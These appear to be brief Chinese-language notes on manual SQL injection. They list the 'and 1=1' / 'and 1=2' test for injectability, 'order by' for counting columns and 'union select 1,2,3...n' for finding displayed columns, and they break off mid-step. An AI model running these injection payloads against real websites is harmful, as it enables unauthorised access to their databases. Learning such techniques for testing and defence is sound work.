判断是否可以注入

and 1=1 正常运行

and 1=2 产生错误

表明可以进行注入。

判断字段数

order by [int] 试出显示的表一共有几个字段

判断第几列能显示

and 1=2 union select 1,2,3,4......n

and 1=2......